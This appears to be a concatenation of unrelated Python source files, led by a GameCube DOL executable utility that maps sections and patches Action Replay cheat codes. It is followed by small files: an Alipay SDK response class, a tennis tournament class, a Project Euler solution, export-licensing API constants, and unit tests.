def set_offset(self, offset:int): self.__offset = offset
def is_used(self):
return (self.__offset != 0) and (self.address() != 0) and (self.length() != 0)
def format_raw(self):
section_raw_name = f"text{self.index()}".ljust(7) if self.type() == SectionType.TEXT else f"data{self.index()}".ljust(7)
return f"| {section_raw_name} | {self.offset():08x} | {self.address():08x} | {self.length():08x} | {str(self.is_used()).ljust(5)} |\n"
def resolve_img2virtual(self, offset:int):
if offset >= self.offset() and offset < self.offset() + self.length():
return self.address() + offset - self.offset()
return None
def resolve_virtual2img(self, address:int):
if address >= self.address() and address < self.end_address():
return self.offset() + address - self.address()
return None
class Bss(MemoryObject):
# list of memory objects out of sections
__splited = None
def __init__(self, address:int, length:int):
super().__init__(address, SectionType.BSS, "bss", length=length)
def format(self):
return f"bss: address:{self.address():08x} length:{self.length():08x}"
def split(self, memory_objects:list):
self.__splited = self - memory_objects
if self.__splited is not None: # If .bss is mapped
for i, splited in enumerate(self.__splited):
splited.set_name(f".bss{i}")
return self.__splited
def splited(self): return self.__splited
def get_unmapped_intervals(merged_intervals:list, memory_objects:list):
"""
Description: This function is usefull to find new sections to create for an .ini file processing
input: merged_intervals = [MemoryObject, ...]
* non overlapping, with length > 0 (There is always sections in dols)
input: memory_objects = [ActionReplayCode, ...]
* could overlap
return [MemoryObject, ...] else None
* unmapped sections intervals where we found ARCodes sorted by address
* it means that this intervals are used but are not in already existing intervals (merged_intervals)
"""
memory_objects.sort(key=lambda x:x.address())
unoverlapped_list = []
for memory_object in memory_objects:
unoverlapped = memory_object - merged_intervals
if unoverlapped is not None:
unoverlapped_list += unoverlapped
if len(unoverlapped_list) == 0:
return None
merged_intervals = copy.deepcopy(merged_intervals)
unoverlapped_list.sort(key=lambda x:x.address())
def _get_unmapped_intervals(merged_intervals:list, unoverlapped_list:list):
"""
input: merged_intervals: [MemoryObject, ...]
* contains intervals separated by empty interval
input: unoverlapped_list: [MemoryObject, ...]
* contains intervals < merged_intervals or intervals > merged_intervals
return [MemoryObject, ...]
* each of the returned memory objects describe an unmapped interval used by unoverlapped_list
"""
if len(merged_intervals) == 0:
return [MemoryObject(unoverlapped_list[0].address(), end_address=unoverlapped_list[-1].end_address())]
merged_interval = merged_intervals.pop(0)
new_unmapped = []
for i, memory_object in enumerate(unoverlapped_list):
if memory_object < merged_interval:
if new_unmapped == []:
new_unmapped = [memory_object]
continue
else:
new_unmapped[0].set_end_address(memory_object.end_address())
continue
else:
if len(unoverlapped_list[i:]) == 0: return new_unmapped
return new_unmapped + _get_unmapped_intervals(merged_intervals, unoverlapped_list[i:])
return new_unmapped
return _get_unmapped_intervals(merged_intervals, unoverlapped_list)
def get_overlapping_arcodes(action_replay_list:list):
"""
input: action_replay_list = [ActionReplayCode, ...]
return [(ActionReplayCode, ActionReplayCode), ...] else None
Get overlapping action replay code in memory. Return couples of arcodes that patch sames memory addresses.
"""
if len(action_replay_list) < 2: return None
action_replay_list.sort(key=lambda x:x.address())
# Find overlaps between ARCodes
overlaps_list = []
last_arcode = action_replay_list[0]
for action_replay_code in action_replay_list[1:]:
# Intersect
if last_arcode & action_replay_code:
overlaps_list.append( (last_arcode, action_replay_code) )
last_arcode = action_replay_code
return overlaps_list if overlaps_list != [] else None
def parse_action_replay_ini(path:Path):
"""
input: path of ini
return [ActionReplayCode, ...]
Parse an ini file. All ARCodes present in the ini will be enabled without taking care of [ActionReplay_Enabled] section.
* empty lines are removed
* lines beginning with $ are concidered as comments and are removed
* lines beginning with [ are concidered as comments and are removed
* others lines have to be in format: "0AXXXXXX XXXXXXXX" with A in [0,1,2,3,4,5] and X in [0-9a-fA-F]
"""
return [ActionReplayCode(action_replay_line, i + 1) for i, action_replay_line in enumerate(path.read_text().splitlines()) if len(action_replay_line) != 0 and action_replay_line[0] not in ["$", "["]]
class ActionReplayCode(MemoryObject):
__PATTERN = re.compile("^(0[012345][0-9a-zA-Z]{6}) ([0-9a-zA-Z]{8})$") # class variable give better perfs for regex processing
__line_number = None
__opcode = None
def __init__(self, action_replay_code:str, line_number:int):
self.__line_number = line_number
res = ActionReplayCode.__PATTERN.fullmatch(action_replay_code)
if res is None:
raise InvalidIniFileEntryError(f"Error - Arcode has to be in format: '0AXXXXXX XXXXXXXX' with A in [0,1,2,3,4,5] and X in [0-9a-fA-F] line {line_number} \"{action_replay_code}\".")
# address = (first 4 bytes & 0x01FFFFFF) | 0x80000000
address = (int(res[1], base=16) & 0x01FFFFFF) | 0x80000000
# opcode = first byte & 0xFE
self.__opcode = int(res[1][:2], base=16) & 0xFE
if self.__opcode not in [0, 2, 4]:
raise InvalidIniFileEntryError(f"Error - ARCode has to be in format: '0AXXXXXX XXXXXXXX' with A in [0,1,2,3,4,5] and X in [0-9a-fA-F] line {line_number} \"{action_replay_code}\".")
if self.__opcode == 0x04:
datas = int(res[2], 16).to_bytes(4, "big")
elif self.__opcode == 0x02:
datas = (int(res[2][:4], 16) + 1) * int(res[2][4:], 16).to_bytes(2, "big")
elif self.__opcode == 0x00:
datas = (int(res[2][:6], 16) + 1) * int(res[2][6:], 16).to_bytes(1, "big")
length = len(datas)
try:
super().__init__(address, SectionType.UNMAPPED, action_replay_code, length=length)
except OutOfMemoryError:
raise OutOfMemoryError(f"Error - Out of memory address line {line_number}: {address:08x}:{address + length} should be in 0x80003100:0x81200000.")
self.set_datas(datas)
def __str__(self):
return f"| {str(self.__line_number).rjust(8)} | {self.name()} | {self.address():08x} | {self.end_address():08x} | {self.length():08x} |"
def __eq__(a, b): return a.name() == b.name() and a.address() == b.address() and a.end_address() == b.end_address() and a.__line_number == b.__line_number and a.__opcode == b.__opcode and a.datas() == b.datas()
def __ne__(a, b): return a.name() != b.name() or a.address() != b.address() or a.end_address() != b.end_address() or a.__line_number != b.__line_number or a.__opcode != b.__opcode or a.datas() != b.datas()
def line_number(self): return self.__line_number
class Dol:
#HEADER_LEN = 0x100
__path = None
# [Section, ...] with length = 18
__sections = None
# Bss object
__bss = None
__entry_point = None
def __init__(self, path:Path):
self.__path = path
datas = path.read_bytes()
self.__bss = Bss( int.from_bytes(datas[0xd8:0xdc], "big"), int.from_bytes(datas[0xdc:0xe0], "big") )
self.__entry_point = int.from_bytes(datas[0xe0:0xe4], "big")
current_section = 0
sections = []
for i in range(18):
section = Section(
i, # index
int.from_bytes(datas[i*4:i*4+4], "big"), # offset
int.from_bytes(datas[0x48+i*4:0x48+i*4+4], "big"), # address
int.from_bytes(datas[0x90+i*4:0x90+i*4+4], "big")) # length
if section.is_used():
if i == 7: current_section = 0
section.set_datas(datas[section.offset():section.offset()+section.length()])
section.set_name( f".text{current_section}" if i < 7 else f".data{current_section}" )
current_section += 1
sections.append(section)
# Make a tuple to lock from sorting
self.__sections = tuple(sections)
def __str__(self):
'Print a table with each sections from 0 to 17.'
str_buffer = f"Entry point: {self.__entry_point:08x}\n\n|"
str_buffer += "-"*50 + "|\n| Section | Offset | Address | Length | Used |\n|" + "-"*9 + ("|"+"-"*10)*3 + "|" + "-"*7 + "|\n"
for section in self.__sections:
str_buffer += section.format_raw()
return str_buffer + "|"+"-"*50+f"|\n\n{self.__bss.format()}"
def __get_used_sections(self): return [section for section in self.__sections if section.is_used()]
def __get_merged_mapped_memory(self):
"""
Get sorted intervals where there is datas or text.
return [MemoryObject, ...]
* Merged and sorted
private [Section, ...]
* Don't overlap, section >= 1
"""
memory_objects = [section.to_memory_object() for section in self.__get_used_sections()]
memory_objects.sort(key=lambda x:x.address())
merged_intervals = [memory_objects[0]]
for memory_object in memory_objects[1:]:
if merged_intervals[-1].end_address() == memory_object.address():
merged_intervals[-1].set_end_address( memory_object.end_address() )
else:
merged_intervals.append(memory_object)
return merged_intervals
def resolve_img2virtual(self, offset:int):
"""
input: dol_absolute_offset
return virtual_memory_address
"""
memory_address = None
for section in self.__sections:
if section.is_used():
virtual_address = section.resolve_img2virtual(offset)
if virtual_address is not None:
return virtual_address
raise InvalidImgOffsetError(f"Error - Invalid dol image offset: {offset:08x}")
def resolve_virtual2img(self, address:int):
"""
input: virtual_memory_address
return dol_absolute_offset
"""
for section in self.__sections:
if section.is_used():
offset = section.resolve_virtual2img(address)
if offset is not None:
return offset
raise InvalidVirtualAddressError(f"Error - Not found in dol initial sections: {address:08x}")
def stats(self):
# https://www.gc-forever.com/yagcd/chap4.html#sec4
# system: 0x80000000 -> 0x80003100
# available: 0x80003100 -> 0x81200000
# apploader: 0x81200000 -> 0x81300000
# Bootrom/IPL: 0x81300000 -> 0x81800000
# Now we have to generate a memory map with splited bss and empty spaces
# [ [section_name, beg_addr, end_addr, length], ... ]
memory_objects = [
MemoryObject(0x80000000, SectionType.SYS, "System", length=0x3100),
MemoryObject(0x81200000, SectionType.SYS, "Apploader", length=0x100000),
MemoryObject(0x81300000, SectionType.SYS, "Bootrom/IPL", length=0x500000)] + self.__get_used_sections()
splited = self.__bss.split(memory_objects)
if splited is not None:
memory_objects += splited
# We search now unmapped program space
memory_objects += MemoryObject(0x80003100, SectionType.UNMAPPED, "Empty", end_address=0x81200000) - memory_objects
memory_objects.sort(key=lambda x: x.address())
str_buffer = "\n|"+"-"*46+"|\n| Section | beg_addr | end_addr | length |\n|" + "-"*13 + ("|"+"-"*10)*3 + "|\n"
for memory_object in memory_objects:
str_buffer += str(memory_object)+"\n"
print(f"{self}{str_buffer}|"+"-"*46+"|")
def extract(self, filename:str, section_index:int, output_path:Path):
if section_index > 17:
raise Exception("Error - Section index has to be in 0 - 17")
output_path.write_bytes(self.__sections[section_index].datas())
def analyse_action_replay(self, action_replay_list:list):
merged_intervals = self.__get_merged_mapped_memory()
overlaps_list = get_overlapping_arcodes(action_replay_list)
# Get unmapped groups splited by sections intervals:
# each group contains intervals to patch grouped by data sections to add
unmapped_memory_objects = get_unmapped_intervals(merged_intervals, action_replay_list)
if overlaps_list is not None:
str_buffer = "Found overlapping ARCodes:\n"
str_buffer += "|"+"-"*127+"|\n| Line | ActionReplayCode1 | beg_addr | end_addr | length | Line | ActionReplayCode2 | beg_addr | end_addr | length |\n|" + ("-"*10 + "|" + "-"*19 + ("|"+"-"*10)*3 + "|")*2 + "\n"
for [arcode0, arcode1] in overlaps_list:
str_buffer += str(arcode0)[-1] + str(arcode1) + "\n"
print(str_buffer+"|"+"-"*127+"|")
else:
print(f"No overlapping ARCodes found.")
if unmapped_memory_objects is not None:
str_buffer = "\nUnmapped virtual addresses intervals used by ARCodes:\n"+"|"+"-"*32+"|\n| beg_addr | end_addr | length |\n"+("|"+"-"*10)*3 +"|\n"
for unmapped_memory_object in unmapped_memory_objects:
unmapped_memory_object.align()
str_buffer += f"| {unmapped_memory_object.address():08x} | {unmapped_memory_object.end_address():08x} | {unmapped_memory_object.length():08x} |\n"
print(str_buffer+"|"+"-"*32+"|")
print("Use -par file.dol -ini arcodes.ini -o output.dol -sr to remap sections and allow complete processing of the ARCodes in this ini file. Else the patching process will be interupted for out of dol ARCodes.")
else:
print(f"No out of sections ARCodes found.\n")
def patch_memory_objects(self, output_path:Path, memory_objects:list):
"""
input: [MemoryObject, ... ]
return True
raise SectionsOverflowError if part of the bytecode is out of the existing sections
raise InvalidVirtualAddressError if the base virtual address is out of the existing sections
"""
sections = self.__get_used_sections()
sections.sort(key=lambda x: x.address())
def split_and_patch(sections:list, memory_object:MemoryObject):
"""
When patching a section we could overflow on the next section or in the previous.
input: ActionReplayCode
return True
raise SectionsOverflowError if part of the bytecode is out of the existing sections
raise InvalidVirtualAddressError if the base virtual address is out of the existing sections
"""
for section in sections:
try:
# Intersection
if not memory_object & section: continue
# Split left_interval, in, right_interval
splited = memory_object / section
if IntervalDiv.LEFT in splited:
split_and_patch(sections, splited[IntervalDiv.LEFT])
logging.debug(f"----> offset:{section.offset() + splited[IntervalDiv.IN].address() - section.address():08x} val:{splited[IntervalDiv.IN].datas().hex()}")
section.update_datas( splited[IntervalDiv.IN] )
if IntervalDiv.RIGHT in splited:
split_and_patch(sections, splited[IntervalDiv.RIGHT])
return True
except InvalidVirtualAddressError:
raise SectionsOverflowError(f"Error - Value Overflow in an inexistant dol initial section: {memory_object.address():08x}:{memory_object.datas().hex()}")
raise InvalidVirtualAddressError(f"Error - Not found in dol initial sections: {memory_object.address():08x}:{memory_object.end_address():08x}")
for memory_object in memory_objects:
logging.debug(f"Processing {memory_object.name()} address:{memory_object.address():08x}")
split_and_patch(sections, memory_object)
self.__save(output_path)
def remap_sections(self, action_replay_list:list):
merged_intervals = self.__get_merged_mapped_memory()
unmapped_memory_objects = get_unmapped_intervals(merged_intervals, action_replay_list)
if unmapped_memory_objects is None:
return True
text_sections = []
data_sections = []
for section in self.__sections:
if section.is_used():
section.set_offset(0)
section.set_index(None)
if section.type() == SectionType.TEXT:
text_sections.append(section)
else:
data_sections.append(section)
self.__sections = None
if len(unmapped_memory_objects) + len(data_sections) > 11:
raise Exception("Error - Not enought empty data sections available for remapping.")
for unmapped_memory_object in unmapped_memory_objects:
unmapped_memory_object.align()
new_section = Section(None, 0, unmapped_memory_object.address(), unmapped_memory_object.length(), section_type=SectionType.UNMAPPED)
new_section.set_datas( bytearray(b"\x00" * new_section.length()) )
data_sections.append( new_section )
text_sections.sort(key=lambda x: x.address())
data_sections.sort(key=lambda x: x.address())
sections = []
current_offset = 0x100
i = 0
for text_section in text_sections:
sections.append( text_section )
text_section.set_index(i)
text_section.set_offset(current_offset)
text_section.set_type(SectionType.TEXT)
current_offset += text_section.length()
i += 1
while i < 7:
sections.append( Section(i, 0, 0, 0) )
i += 1
for data_section in data_sections:
sections.append( data_section )
data_section.set_index(i)
data_section.set_offset(current_offset)
data_section.set_type(SectionType.DATA)
current_offset += data_section.length()
i += 1
while i < 18:
sections.append( Section(i, 0, 0, 0) )
i += 1
self.__sections = tuple(sections)
def __save(self, output_path:Path):
offsets = b""
addresses = b""
lengths = b""
for section in self.__sections:
offsets += section.offset().to_bytes(4, "big")
addresses += section.address().to_bytes(4, "big")
lengths += section.length().to_bytes(4, "big")
datas = offsets + addresses + lengths +\
self.__bss.address().to_bytes(4, "big") + self.__bss.length().to_bytes(4, "big") +\
self.__entry_point.to_bytes(4, "big")
datas = datas.ljust(0x100, b"\x00")
for section in sorted(self.__sections, key=lambda x: x.offset()):
if section.is_used():
if len(datas) != section.offset():
raise InvalidSectionOffsetError(f"Error - Section {section.index()} has an offset that does'nt match the previous datas length.")
if len(section.datas()) != section.length():
raise Exception(f"Error - Invalid datas length.")
datas += section.datas()
output_path.write_bytes(datas)
def get_argparser():
import argparse
parser = argparse.ArgumentParser(description='dol file format utilities - [GameCube] v' + __version__)
parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
parser.add_argument('-v', '--verbose', action='store_true', help='verbose mode')
parser.add_argument('input_path', metavar='INPUT', help='')
parser.add_argument('-o', '--output-path', type=str, help='-o path: output path.', default=None)
parser.add_argument('-ini', '--ini-path', type=str, help='-ini path: ini path.', default=None)
parser.add_argument('-sr', '--sections-remap', action='store_true', help="-sr: remap the data sections of the dol to allow full ARCodes ini"
" file processing.", default=None)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-v2i', '--virtual2image', type=str, help="-v2i source.dol virtual_address: Translate a virtual address into "
"a dol offset if this was originaly mapped from data or text. virtual_address has to be in hexadecimal: 80003100.")
group.add_argument('-i2v', '--image2virtual', type=str, help="-i2v source.dol dol_offset: Translate a dol offset to a virtual ad"
"dress mapped from data or text. dol_offset has to be in hexadecimal: 2000.")
group.add_argument('-s', '--stats', action='store_true', help="-s source.dol: Get stats about entry point, sections, bss and unu"
"sed virtual address space.")
group.add_argument('-e', '--extract', type=int, help="-e source.dol section_index [-o output_path]: Extract a section. index mus"
"t be between 0 and 17")
group.add_argument('-aar', '--analyse-action-replay', action='store_true', help="-aar source.dol action_replay.ini: Analyse an i"
"ni file containing a list of [write] directives to show unmapped sections to add for processing all ARCodes including thoos"
"e who are in inexistant sections. Handle only ARCodes beginning with [00, 01, 02, 03, 04, 05].")
group.add_argument('-par', '--patch-action-replay', action='store_true', help="-par source.dol -ini action_replay.ini [-o output"
"_path] [-sr]: Patch initialised data inside the dol with an ini file containing a list of [write] directives. Handle only A"
"RCodes beginning with [00, 01, 02, 03, 04, 05]. If -sr is specified then add or update .data sections to allow full ini proc"
"essing.")
return parser
if __name__ == '__main__':
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)
args = get_argparser().parse_args()
p_input = Path(args.input_path)
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
if not p_input.is_file():
raise Exception("Error - Invalid dol file path.")
dol = Dol(p_input)
if args.virtual2image:
virtual_address = int(args.virtual2image, 16)
try:
offset = dol.resolve_virtual2img(virtual_address)
print(f"Virtual address {virtual_address:08x} is at dol offset {offset:08x}")
except InvalidVirtualAddressError:
print("This virtual address is not in the dol.")
elif args.image2virtual:
offset = int(args.image2virtual, 16)
try:
virtual_address = dol.resolve_img2virtual(offset)
print(f"Dol offset {offset:08x} is at virtual address {virtual_address:08x}")
except InvalidImgOffsetError:
print("This dol offset is invalid.")
elif args.stats:
dol.stats()
elif args.extract:
logging.info("### Extract section")
index = args.extract
section_type = "text" if index < 7 else "data"
output_path = Path(args.output_path) if args.output_path is not None else Path(f"{p_input.name}_{section_type}{index}")
logging.info(f"Extracting section {index} in file {output_path}...")
dol.extract(p_input.name, index, output_path)
elif args.analyse_action_replay:
logging.info("### Analyse Action Replay ini file")
if args.ini_path is None:
raise Exception("Error - Action Replay ini file has to be specified.")
action_replay_ini_path = Path(args.ini_path)
if not action_replay_ini_path.is_file():
raise Exception("Error - Invalid action replay ini file path.")
dol.analyse_action_replay(parse_action_replay_ini(action_replay_ini_path))
elif args.patch_action_replay:
logging.info("### Patch dol using Action Replay ini file")
if args.ini_path is None:
raise Exception("Error - Action Replay ini file has to be specified.")
action_replay_ini_path = Path(args.ini_path)
if not action_replay_ini_path.is_file():
raise Exception("Error - Invalid action replay ini file path.")
if not args.output_path:
raise Exception("Error - Output path has to be specified.")
output_path = Path(args.output_path)
if output_path.is_file():
raise Exception(f"Error - Please remove {output_path}.")
logging.info(f"Patching dol {p_input} in {output_path} using {action_replay_ini_path} ini file...")
action_replay_list = parse_action_replay_ini(action_replay_ini_path)
if args.sections_remap != None:
logging.info(f"Sections remapping using action replay ini file...")
dol.remap_sections(action_replay_list)
dol.patch_memory_objects(output_path, action_replay_list)
| python |
# unittest for cal.py
import unittest
import cal
class TestCal(unittest.TestCase):
def test_add(self):
result = cal.add(10,5)
self.assertEqual(result, 15)
if __name__ == '__main__':
unittest.main()
# to avoid using this if statement below; run python -m unittest test_cal.py
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayEcapiprodDrawndnContractGetResponse(AlipayResponse):
def __init__(self):
super(AlipayEcapiprodDrawndnContractGetResponse, self).__init__()
self._contract_content = None
self._contract_no = None
self._request_id = None
@property
def contract_content(self):
return self._contract_content
@contract_content.setter
def contract_content(self, value):
self._contract_content = value
@property
def contract_no(self):
return self._contract_no
@contract_no.setter
def contract_no(self, value):
self._contract_no = value
@property
def request_id(self):
return self._request_id
@request_id.setter
def request_id(self, value):
self._request_id = value
def parse_response_content(self, response_content):
response = super(AlipayEcapiprodDrawndnContractGetResponse, self).parse_response_content(response_content)
if 'contract_content' in response:
self.contract_content = response['contract_content']
if 'contract_no' in response:
self.contract_no = response['contract_no']
if 'request_id' in response:
self.request_id = response['request_id']
| python |
"""
# Data Structures and Algorithms - Part B
# Created by Reece Benson (16021424)
"""
from tennis import Round
from tennis.Colours import Colours
class Tournament():
# Variables
name = None
game = None
parent = None
json_data = None
rounds = None
gender = None
difficulty = None
prize_money = None
complete = None
def __init__(self, _game, _name, _parent, _json_data):
self.name = _name
self.game = _game
self.parent = _parent
self.json_data = _json_data
self.rounds = { }
self.difficulty = _json_data['_difficulty']
self.prize_money = _json_data['prize_money']
self.complete = False
# Read in Round Data
for round_number in _json_data["rounds"]:
round_data = _json_data["rounds"][round_number]
# Load our Round in (if it is new)
if(round_number not in self.rounds):
# Create our Tournament Object
self.rounds.update({ round_number: Round.Round(self.game, round_number, self, round_data) })
if(_game.debug):
print("[TOURNAMENT]: Tournament '{}' made!".format(_name))
def get_name(self):
return self.name
def get_gender(self):
return self.gender
def get_rounds(self):
return [ self.rounds[r] for r in self.rounds ]
def get_round(self, round_id):
return self.rounds["round_{0}".format(round_id)]
def get_difficulty(self):
return self.difficulty
def get_prize_money(self):
return self.prize_money
def is_complete(self):
return self.complete
def set_complete(self, state):
# Set this tournament as complete
self.complete = state
# Check if other tournaments are complete
all_complete = True
for t in self.parent.get_tournaments():
if(not t.is_complete()):
all_complete = False
if(all_complete):
# Open up the next season
print("\n\nAll tournaments are now " + Colours.OKGREEN + "complete" + Colours.ENDC + "! Start opening season {}".format(self.parent.get_id() + 1))
input(">>> Press <Return> to continue...")
# Create New Season
self.game.add_season(self.parent.get_id() + 1) | python |
#-*- encoding: utf-8 -*-
"""
Ordered fractions
Consider the fraction, n/d, where n and d are positive integers. If n<d and HCF(n,d)=1, it is called a reduced proper fraction.
If we list the set of reduced proper fractions for d ≤ 8 in ascending order of size, we get:
1/8, 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5, 5/8, 2/3, 5/7, 3/4, 4/5, 5/6, 6/7, 7/8
It can be seen that 2/5 is the fraction immediately to the left of 3/7.
By listing the set of reduced proper fractions for d ≤ 1,000,000 in ascending order of size, find the numerator of the fraction immediately to the left of 3/7.
"""
from utils import *
print min(((d * 3 / 7, d) for d in range(1, 10 ** 6) if d % 7 != 0), key=lambda (n, d): 3. / 7 - n * 1. / d)[0]
# 428570
| python |
from enum import Enum
ISO8601_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"
DATE_FORMAT = "%Y-%m-%d"
ALL_CASES_QUEUE_ID = "00000000-0000-0000-0000-000000000001"
UPDATED_CASES_QUEUE_ID = "00000000-0000-0000-0000-000000000004"
ENFORCEMENT_XML_MAX_FILE_SIZE = 1000000 # 1 MB
class GoodSystemFlags:
CLC_FLAG = "00000000-0000-0000-0000-000000000002"
PV_GRADING_FLAG = "00000000-0000-0000-0000-000000000003"
# URLS
ORGANISATIONS_URL = "/organisations/"
ORGANISATION_STATUS_URL = "/status/"
CASE_URL = "/cases/"
GOOD_URL = "/goods/"
GOODS_TYPE_URL = "/goods-types/"
APPLICATIONS_URL = "/applications/"
CASE_NOTES_URL = "/case-notes/"
DOCUMENTS_URL = "/documents/"
USER_ADVICE_URL = "/user-advice/"
TEAM_ADVICE_URL = "/team-advice/"
VIEW_TEAM_ADVICE_URL = "/view-team-advice/"
FINAL_ADVICE_URL = "/final-advice/"
VIEW_FINAL_ADVICE_URL = "/view-final-advice/"
ACTIVITY_URL = "/activity/"
ORGANISATION_SITES_ACTIVITY_URL = "/sites-activity/"
ACTIVITY_FILTERS_URL = "/activity/filters/"
ECJU_QUERIES_URL = "/ecju-queries/"
END_USER_ADVISORY_URL = "/queries/end-user-advisories/"
CASE_DENIAL_REASONS_URL = "/denial-reasons/"
SITES_URL = "/sites/"
USERS_URL = "/users/"
TEAMS_URL = "/teams/"
LICENCES_URL = "/licences/"
QUEUES_URL = "/queues/"
AUTHENTICATION_URL = "/gov-users/authenticate/"
GOV_USERS_URL = "/gov-users/"
GOV_USERS_ROLES_URL = "/gov-users/roles/"
GOV_USERS_PERMISSIONS_URL = "/gov-users/permissions/"
NOTIFICATIONS_URL = "/gov-users/notifications/"
FLAGS_URL = "/flags/"
OPEN_GENERAL_LICENCES_URL = "/open-general-licences/"
ASSIGN_FLAGS_URL = FLAGS_URL + "assign/"
FLAGGING_RULES = FLAGS_URL + "rules/"
FLAGS_CASE_LEVEL_FOR_TEAM = "/flags/?level=Case&team=True"
FLAGS_GOOD_LEVEL_FOR_TEAM = "/flags/?level=Good&team=True"
FLAGS_ORGANISATION_LEVEL_FOR_TEAM = "/flags/?level=Organisation&team=True"
GOODS_QUERIES_URL = "/queries/goods-queries/"
CLC_RESPONSE_URL = "/clc-response/"
PV_GRADING_RESPONSE_URL = "/pv-grading-response/"
PICKLIST_URL = "/picklist/"
LETTER_TEMPLATES_URL = "/letter-templates/"
GOOD_CLC_REVIEW_URL = "/goods/control-list-entries/"
MANAGE_STATUS_URL = "/status/"
FINAL_DECISION_URL = "/final-decision/"
DURATION_URL = "/duration/"
GENERATED_DOCUMENTS_URL = "/generated-documents/"
GENERATED_DOCUMENTS_PREVIEW_URL = GENERATED_DOCUMENTS_URL + "preview/"
PREVIEW_URL = "/preview/"
GENERATE_PREVIEW_URL = "generate-preview/"
DESTINATION_URL = CASE_URL + "destinations/"
CASE_OFFICER_URL = "/case-officer/"
NEXT_REVIEW_DATE_URL = "/review-date/"
FINALISE_CASE_URL = "/finalise/"
ROUTING_RULES_URL = "/routing-rules/"
ROUTING_RULES_STATUS_URL = "/status/"
ENFORCEMENT_URL = CASE_URL + "enforcement-check/"
APPLICANT_URL = "/applicant/"
COMPLIANCE_URL = "/compliance/"
COMPLIANCE_SITE_URL = "site/"
COMPLIANCE_VISIT_URL = "visit/"
COMPLIANCE_LICENCES_URL = "/licences/"
COMPLIANCE_PEOPLE_PRESENT_URL = "people-present/"
OPEN_LICENCE_RETURNS_URL = "/compliance/open-licence-returns/"
# Static URLs
STATIC_URL = "/static/"
CASE_TYPES_URL = STATIC_URL + "case-types/"
DENIAL_REASONS_URL = STATIC_URL + "denial-reasons/"
COUNTRIES_URL = STATIC_URL + "countries/"
STATUSES_URL = STATIC_URL + "statuses/"
STATUS_PROPERTIES_URL = STATUSES_URL + "properties/"
CONTROL_LIST_ENTRIES_URL = STATIC_URL + "control-list-entries/"
GOV_PV_GRADINGS_URL = STATIC_URL + "private-venture-gradings/gov/"
PV_GRADINGS_URL = STATIC_URL + "private-venture-gradings/"
LETTER_LAYOUTS_URL = STATIC_URL + "letter-layouts/"
DECISIONS_URL = STATIC_URL + "decisions/"
# Permissions
MAKE_FINAL_DECISIONS = "MAKE_FINAL_DECISIONS"
DECISIONS_LIST = ["approve", "refuse", "no_licence_required"]
# Role IDs
SUPER_USER_ROLE_ID = "00000000-0000-0000-0000-000000000002"
# Document types
GENERATED_DOCUMENT = "GENERATED"
# Case types
APPLICATION_CASE_TYPES = ["open", "standard", "hmrc"]
CLEARANCE_CASE_TYPES = ["exhibition_clearance", "gifting_clearance", "f680_clearance"]
class AdviceType:
CONFLICTING = "conflicting"
class Permission(Enum):
MANAGE_TEAM_ADVICE = "MANAGE_TEAM_ADVICE"
MANAGE_TEAM_CONFIRM_OWN_ADVICE = "MANAGE_TEAM_CONFIRM_OWN_ADVICE"
MANAGE_LICENCE_FINAL_ADVICE = "MANAGE_LICENCE_FINAL_ADVICE"
MANAGE_CLEARANCE_FINAL_ADVICE = "MANAGE_CLEARANCE_FINAL_ADVICE"
ADMINISTER_ROLES = "ADMINISTER_ROLES"
REVIEW_GOODS = "REVIEW_GOODS"
CONFIGURE_TEMPLATES = "CONFIGURE_TEMPLATES"
MANAGE_LICENCE_DURATION = "MANAGE_LICENCE_DURATION"
RESPOND_PV_GRADING = "RESPOND_PV_GRADING"
MANAGE_ORGANISATIONS = "MANAGE_ORGANISATIONS"
REOPEN_CLOSED_CASES = "REOPEN_CLOSED_CASES"
MANAGE_FLAGGING_RULES = "MANAGE_FLAGGING_RULES"
MANAGE_TEAM_ROUTING_RULES = "MANAGE_TEAM_ROUTING_RULES"
MANAGE_ALL_ROUTING_RULES = "MANAGE_ALL_ROUTING_RULES"
ACTIVATE_FLAGS = "ACTIVATE_FLAGS"
MANAGE_PICKLISTS = "MANAGE_PICKLISTS"
ENFORCEMENT_CHECK = "ENFORCEMENT_CHECK"
MAINTAIN_FOOTNOTES = "MAINTAIN_FOOTNOTES"
MAINTAIN_OGL = "MAINTAIN_OGL"
class FlagLevels:
CASES = "cases"
GOODS = "goods"
ORGANISATIONS = "organisations"
DESTINATIONS = "destinations"
class UserStatuses:
ACTIVE = "Active"
DEACTIVATED = "Deactivated"
class SystemTeamsID(Enum):
ADMIN = "00000000-0000-0000-0000-000000000001"
class CaseType:
EXHIBITION = "exhibition_clearance"
F680 = "f680_clearance"
HMRC = "hmrc"
class GoodsTypeCategory:
MILITARY = "military"
CRYPTOGRAPHIC = "cryptographic"
MEDIA = "media"
UK_CONTINENTAL_SHELF = "uk_continental_shelf"
DEALER = "dealer"
| python |
import pytest
import case_conversion.utils as utils
from case_conversion import Case, InvalidAcronymError
@pytest.mark.parametrize(
"string,expected",
(
("fooBarString", (["foo", "Bar", "String"], "", False)),
("FooBarString", (["Foo", "Bar", "String"], "", False)),
("foo_bar_string", (["foo", None, "bar", None, "string"], "_", False)),
("foo-bar-string", (["foo", None, "bar", None, "string"], "-", False)),
("FOO_BAR_STRING", (["foo", None, "bar", None, "string"], "_", True)),
("foo.bar.string", (["foo", None, "bar", None, "string"], ".", False)),
("foo bar string", (["foo", None, "bar", None, "string"], " ", False)),
("foo/bar/string", (["foo", None, "bar", None, "string"], "/", False)),
("foo\\bar\\string", (["foo", None, "bar", None, "string"], "\\", False)),
("foobarstring", (["foobarstring"], "", False)),
("FOOBARSTRING", (["foobarstring"], "", True)),
),
)
def test_segment_string(string, expected):
assert utils.segment_string(string) == expected
@pytest.mark.parametrize(
"acronyms,expected",
(
(("http",), ["HTTP"]),
(("HTTP",), ["HTTP"],),
(("Http",), ["HTTP"],),
(("httP",), ["HTTP"],),
(("http", "Nasa"), ["HTTP", "NASA"]),
),
)
def test_sanitize_acronyms(acronyms, expected):
assert utils.sanitize_acronyms(acronyms) == expected
@pytest.mark.parametrize(
"s,i,words,expected",
(
# TODO: Add more cases
(0, 1, ["FOO", "bar"], 0),
